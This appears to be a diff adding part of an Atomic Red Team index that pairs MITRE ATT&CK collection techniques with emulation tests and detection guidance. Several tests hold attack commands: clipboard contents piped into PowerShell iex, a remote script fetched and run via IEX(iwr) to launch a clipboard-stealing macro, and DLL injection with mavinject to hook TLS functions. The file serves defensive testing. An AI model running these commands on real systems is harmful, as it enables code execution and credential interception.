+ auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
+ description: 'Utilize PowerShell to echo a command to clipboard and execute
+ it
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ echo Get-Process | clip
+ Get-Clipboard | iex
+ name: powershell
+ - name: Execute commands from clipboard
+ auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
+ description: Echo a command to clipboard and execute it
+ supported_platforms:
+ - macos
+ executor:
+ command: |-
+ echo ifconfig | pbcopy
+ $(pbpaste)
+ name: bash
+ - name: Collect Clipboard Data via VBA
+ auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+ description: 'This module copies the data stored in the user''s clipboard and
+ writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+ cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
+ -ErrorAction Ignore
+
+'
+ name: powershell
+ T1213.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213.001
+ url: https://attack.mitre.org/techniques/T1213/001
+ - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ source_name: Atlassian Confluence Logging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Confluence
+ description: |2
+
+ Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T16:42:09.222Z'
+ created: '2020-02-14T13:09:51.004Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_data_sources:
+ - Third-party application logs
+ - Authentication logs
+ x_mitre_platforms:
+ - SaaS
+ atomic_tests: []
+ T1056.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.004
+ url: https://attack.mitre.org/techniques/T1056/004
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ source_name: Microsoft Hook Overview
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ source_name: Adlice Software IAT Hooks Oct 2014
+ - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ source_name: MWRInfoSecurity Dynamic Hooking 2015
+ - url: https://www.exploit-db.com/docs/17802.pdf
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ source_name: HighTech Bridge Inline Hooking Sept 2011
+ - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ source_name: Volatility Detecting Hooks Sept 2012
+ - url: https://github.com/prekageo/winhook
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ source_name: PreKageo Winhook Jul 2011
+ - url: https://github.com/jay/gethooks
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ source_name: Jay GetHooks Sept 2011
+ - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ source_name: Zairon Hooking Dec 2006
+ - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ source_name: EyeofRa Detecting Hooking June 2017
+ - url: http://www.gmer.net/
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ source_name: GMER Rootkits
+ - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ source_name: Microsoft Process Snapshot
+ - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ source_name: StackExchange Hooks Jul 2012
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Credential API Hooking
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:29:13.565Z'
+ created: '2020-02-11T19:01:15.930Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ identifier: T1056.004
+ atomic_tests:
+ - name: Hook PowerShell TLS Encrypt/Decrypt Messages
+ auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
+ description: 'Hooks functions in PowerShell to read TLS Communications
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_name:
+ description: Dll To Inject
+ type: Path
+ default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
+ server_name:
+ description: TLS Server To Test Get Request
+ type: Url
+ default: https://www.example.com
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
+
+'
+ prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
+ executor:
+ command: |
+ mavinject $pid /INJECTRUNNING #{file_name}
+ curl #{server_name}
+ name: powershell
+ elevation_required: true
+ T1074:
+ technique:
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data Staged
+ description: |-
+ Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
+
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
+ Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074
+ url: https://attack.mitre.org/techniques/T1074
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-09-14T19:48:08.180Z'
+ created: '2017-05-31T21:30:58.938Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1530:
+ technique:
+ id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
+ description: |-
+ Adversaries may access data objects from improperly secured cloud storage.
+
+ Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
+
+ Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.
+ name: Data from Cloud Storage Object
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - external_id: T1530
+ source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1530
+ - source_name: Amazon S3 Security, 2019
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
+ description: Amazon. (2019, May 17). How can I secure the files in my Amazon
+ S3 bucket?. Retrieved October 4, 2019.
+ - source_name: Microsoft Azure Storage Security, 2019
+ url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
+ description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20).
+ Azure Storage security guide. Retrieved October 4, 2019.
+ - source_name: Google Cloud Storage Best Practices, 2019
+ url: https://cloud.google.com/storage/docs/best-practices
+ description: Google. (2019, September 16). Best practices for Cloud Storage.
+ Retrieved October 4, 2019.
+ - source_name: Trend Micro S3 Exposed PII, 2017
+ url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
+ description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed
+ Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.
+ - source_name: Wired Magecart S3 Buckets, 2019
+ url: https://www.wired.com/story/magecart-amazon-cloud-hacks/
+ description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker
+ Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.'
+ - source_name: HIPAA Journal S3 Breach, 2017
+ url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/
+ description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and
+ Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-09T14:02:05.276Z'
+ created: '2019-08-30T18:07:27.741Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Netskope
+ - Praetorian
+ x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
+ service. Activity originating from unexpected sources may indicate improper
+ permissions are set that is allowing access to data. Additionally, detecting
+ failed attempts by a user for a certain object, followed by escalation of
+ privileges by the same user, and access to the same object may be an indication
+ of suspicious activity.
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ atomic_tests: []
+ T1602:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602
+ url: https://attack.mitre.org/techniques/T1602
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: US-CERT TA17-156A SNMP Abuse 2017
+ url: https://us-cert.cisa.gov/ncas/alerts/TA17-156A
+ description: US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved
+ October 19, 2020.
+ - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities
+ url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3
+ description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
+ of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
+ 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Configuration Repository
+ description: |-
+ Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
+
+ Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
+ id: attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T02:26:44.566Z'
+ created: '2020-10-19T23:46:13.931Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks that solicits and obtains the configuration information of the
+ queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)'
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1213:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213
+ url: https://attack.mitre.org/techniques/T1213
+ - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ source_name: Microsoft SharePoint Logging
+ - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ source_name: Atlassian Confluence Logging
+ description: |-
+ Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
+
+ The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+
+ Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
+ name: Data from Information Repositories
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-12T12:16:55.085Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
+ x_mitre_contributors:
+ - Praetorian
+ - Milos Stojadinovic
+ x_mitre_data_sources:
+ - OAuth audit logs
+ - Application logs
+ - Authentication logs
+ - Data loss prevention
+ - Third-party application logs
+ x_mitre_detection: |-
+ As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - SaaS
+ - Office 365
+ atomic_tests: []
+ T1005:
+ technique:
+ created: '2017-05-31T21:30:20.537Z'
+ modified: '2020-05-26T19:21:25.974Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1005
+ external_id: T1005
+ description: |
+ Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
+
+ Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ name: Data from Local System
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a system. Remote access tools with
+ built-in features may interact directly with the Windows API to gather data.
+ Data may also be acquired through Windows system management tools such as
+ [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_system_requirements:
+ - Privileges to access certain files and directories
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
+ T1039:
+ technique:
+ id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Network Shared Drive
+ description: Adversaries may search network shares on computers they have compromised
+ to find files of interest. Sensitive data can be collected from remote systems
+ via shared network drives (host shared directory, network file server, etc.)
+ that are accessible from the current system prior to Exfiltration. Interactive
+ command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ may be used to gather information.
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1039
+ url: https://attack.mitre.org/techniques/T1039
+ - external_id: CAPEC-639
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/639.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T15:42:44.026Z'
+ created: '2017-05-31T21:30:41.022Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access network shared drive
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a network share. Remote access tools
+ with built-in features may interact directly with the Windows API to gather
+ data. Data may also be acquired through Windows system management tools such
+ as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1025:
+ technique:
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Data from Removable Media
+ description: "Adversaries may search connected removable media on computers
+ they have compromised to find files of interest. Sensitive data can be collected
+ from any removable media (optical disk drive, USB memory, etc.) connected
+ to the compromised system prior to Exfiltration. Interactive command shells
+ may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ may be used to gather information. \n\nSome adversaries may also use [Automated
+ Collection](https://attack.mitre.org/techniques/T1119) on removable media."
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T15:44:46.584Z'
+ created: '2017-05-31T21:30:31.584Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access removable media drive and files
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to collect files from a system's connected removable media.
+ Remote access tools with built-in features may interact directly with the
+ Windows API to gather data. Data may also be acquired through Windows system
+ management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
+ atomic_tests: []
+ T1114:
+ technique:
+ id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Collection
+ description: 'Adversaries may target user email to collect sensitive information.
+ Emails may contain sensitive data, including trade secrets or personal information,
+ that can prove valuable to adversaries. Adversaries can collect or forward
+ email from mail servers or clients. '
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114
+ url: https://attack.mitre.org/techniques/T1114
+ - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
+ Retrieved October 8, 2019.
+ url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T18:31:06.417Z'
+ created: '2017-05-31T21:31:25.454Z'
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ x_mitre_detection: |-
+ There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
+
+ File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
